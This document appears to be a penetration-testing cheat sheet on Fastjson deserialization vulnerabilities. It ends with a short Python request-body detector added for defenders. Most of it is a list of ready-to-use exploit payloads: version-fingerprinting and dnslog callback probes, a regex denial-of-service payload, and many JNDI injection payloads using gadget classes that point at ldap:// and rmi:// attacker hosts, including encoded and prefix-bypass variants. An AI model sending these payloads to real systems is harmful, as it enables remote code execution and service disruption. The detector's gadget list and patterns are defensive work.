# Fastjson vulnerability detection

For sites where the goal is only to demonstrate the finding in a penetration test, not to obtain privileges, a callback is enough to validate the issue. For the payloads under "Fastjson outbound-connectivity detection" below, however, a callback does not mean the deserialization vulnerability exists; further exploitation is still needed to confirm it.
## DNS

Trigger a DNS request (the server needs outbound access, and the perimeter devices must allow the DNS protocol).

## TCP/UDP port check

Start a web service with Python on a VPS and trigger a request to it (the server has outbound access but no DNS configured).
## Fastjson version identification

### Triggering an error

Construct an unclosed JSON string so the component throws an exception; the exception may reveal the version.

### Verbose error display

```
payload1: {"@type": "java.lang.AutoCloseable"
payload2: ["test":1]
```

### JNDI request delay (Fastjson <= 1.2.47)

Set the ldap or rmi address to an uncommon external IP (the request will be delayed) and compare with the internal address 127.0.0.1 (returns immediately).

### DoS delay (Fastjson <= 1.2.59)

The more `a` characters in the input, the more noticeable the delay, but this payload may affect the running business system.

```json
{"regex":{"$ref":"$[blue rlike '`[a-zA-Z]+(([a-zA-Z])?[a-zA-Z]*)*$']"},"blue":"aaaa!"}
```
### DNS-based version check

```
Fastjson <= 1.2.47: {"name":{"@type":"java.net.InetAddress","val":"DNS地址"}}
Fastjson >= 1.2.37: {{"@type":"java.net.URL","val":"http://weffewfddd.dnslog.cn"}:"aaa"}
1.1.16 <= Fastjson <= 1.2.24: {"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xxxdsf.dnslog.cn:9999/POC","autoCommit":true}}
```
## Fastjson outbound-connectivity detection

Receiving a callback on dnslog does not by itself mean a fastjson deserialization vulnerability exists.

```json
{"@type":"java.net.Inet6Address","val":"DNS地址"}
```

```json
{"@type":"java.net.Inet4Address","val":"DNS地址"}
```

```
{"@type":"java.net.InetSocketAddress"{"address":,"val":"DNS地址"}}
```
## Fastjson <= 1.2.24

```json
{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://ip/a","autoCommit":true}}
```

### Unicode encoding

Only the `@type` key and its value, and the `dataSourceName` key, are encoded.

```json
{"b":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"ldap://ip/a","autoCommit":true}}
```
## Fastjson <= 1.2.41

Prerequisite: the autoTypeSupport property must be true (the default is false since fastjson >= 1.2.25).

```json
{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"ldap://ip/a","autoCommit":true}
```

## Fastjson <= 1.2.42

Prerequisite: the autoTypeSupport property must be true (the default is false since fastjson >= 1.2.25).

```json
{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"ldap://ip/a","autoCommit":true}
```

## Fastjson <= 1.2.43

Prerequisite: the autoTypeSupport property must be true (the default is false since fastjson >= 1.2.25).

```
{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"ldap://ip/a","autoCommit":true}
```

## Fastjson <= 1.2.45

Prerequisite: the autoTypeSupport property must be true (the default is false since fastjson >= 1.2.25).

```json
{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://ip/a"}}
```

## Fastjson <= 1.2.47

```json
{"a":{"@type": "java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type": "com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://ip/a","autoCommit":true}}
```
## Fastjson <= 1.2.62

CVE-2020-8840

```json
{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"ldap://ip/a"}
```

## Fastjson <= 1.2.66

Prerequisite: the autoTypeSupport property must be true (the default is false since fastjson >= 1.2.25).

```json
{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://ip/a"}
```

```json
{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://ip/a"}
```

```json
{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://ip/a"}}
```

## Fastjson <= 1.2.67

```json
{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"ldap://ip/a"}
```

```json
{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory","jndiNames":["ldap://ip/a"],"Realms":[""]}
```

```json
{"@type":"com.caucho.config.types.ResourceRef","lookupName":"rmi://ip/a"}
```

```json
{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties":{"@type":"java.util.Properties","UserTransaction":"rmi://ip/a"}}
```

## Fastjson <= 1.2.68

```json
{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"rmi://ip/a"}
```

```json
{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","metricRegistry":"rmi://ip/a"}
```
## Fastjson <= 1.2.80

```json
{"@type": "java.lang.Exception","@type": "com.kk.domain.Poc","name":"ping IP"}
```

## Unknown version

```json
{"@type":"java.lang.Exception","@type":"com.github.isafeblue.fastjson.SimpleException","domain": "ping IP"}
```

```json
{"@type":"org.apache.commons.configuration.JNDIConfiguration","prefix":"rmi://ip/a"}
```

```json
{"@type":"org.apache.openjpa.ee.RegistryManagedRuntime","registryName":"rmi://ip/a","rollbackOnly":null}
```

```json
{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"ldap://ip/a"}
```

```
{"a":{"@type":"java.lang.AutoCloseable","@type":"java.io.Reader"},"rand1":{"@type":"java.net.InetSocketAddress",{"address":,"val":"DNS地址"}}}
```
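As an added defender-side example (not from the original page), the following Python check inspects a request body the way a WAF rule or log review would: it folds the `\uXXXX` encoding and the `L...;` / `[` prefix tricks shown above before matching, so the encoded and prefixed variants of a payload are flagged the same as the plain one, and it also catches the duplicate-`@type` shape and the `$ref` rlike DoS. The gadget class list is assembled from the payloads on this page, and the sample body is constructed.

```python
import re

# Gadget classes taken from the payload list on this page (extend as needed).
GADGET_CLASSES = {
    "com.sun.rowset.JdbcRowSetImpl",
    "org.apache.ibatis.datasource.jndi.JndiDataSourceFactory",
    "org.apache.xbean.propertyeditor.JndiConverter",
    "org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup",
    "br.com.anteros.dbcp.AnterosDBCPConfig",
    "com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig",
    "org.apache.shiro.realm.jndi.JndiRealmFactory",
    "com.caucho.config.types.ResourceRef",
    "org.apache.shiro.jndi.JndiObjectFactory",
    "org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig",
    "org.apache.commons.configuration.JNDIConfiguration",
    "org.apache.openjpa.ee.RegistryManagedRuntime",
}
TYPE_KEY = re.compile(r'"@type"\s*:\s*"([^"]*)"')                  # every @type value, in order
DUP_TYPE = re.compile(r'"@type"\s*:\s*"[^"]*"\s*,\s*"@type"\s*:')  # two @type keys in one object
JNDI_URL = re.compile(r"\b(?:ldaps?|rmi)://", re.IGNORECASE)       # JNDI lookup targets
REF_RLIKE = re.compile(r'"\$ref"\s*:\s*"\$\[[^"]*rlike')           # JSONPath $ref with rlike (DoS)

def unescape_unicode(s: str) -> str:
    """Fold \\uXXXX escapes so an encoded "@type" or "dataSourceName" compares equal to plain text."""
    return re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)

def normalize_class(name: str) -> str:
    """Strip the descriptor-style prefixes (L...; LL...; [...) used by the 1.2.41 to 1.2.43 bypasses."""
    return re.sub(r"^[L\[]+", "", name).rstrip(";")

def inspect_body(body: str) -> list:
    """Return finding tags for one request body; an empty list means nothing suspicious was seen."""
    text = unescape_unicode(body)
    findings = []
    for cls in (normalize_class(c) for c in TYPE_KEY.findall(text)):
        if cls in GADGET_CLASSES:
            findings.append("gadget:" + cls)
    if "@type" in text and JNDI_URL.search(text):
        findings.append("jndi-url")
    if DUP_TYPE.search(text):
        findings.append("duplicate-@type")
    if REF_RLIKE.search(text):
        findings.append("regex-dos")
    return findings

if __name__ == "__main__":
    # Constructed sample body in the 1.2.42 shape; prints ['gadget:com.sun.rowset.JdbcRowSetImpl', 'jndi-url']
    print(inspect_body(r'{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"ldap://ip/a","autoCommit":true}'))
```

The string-level matching is deliberate: several payloads above are not valid JSON and a strict parser would reject them before any class name is examined.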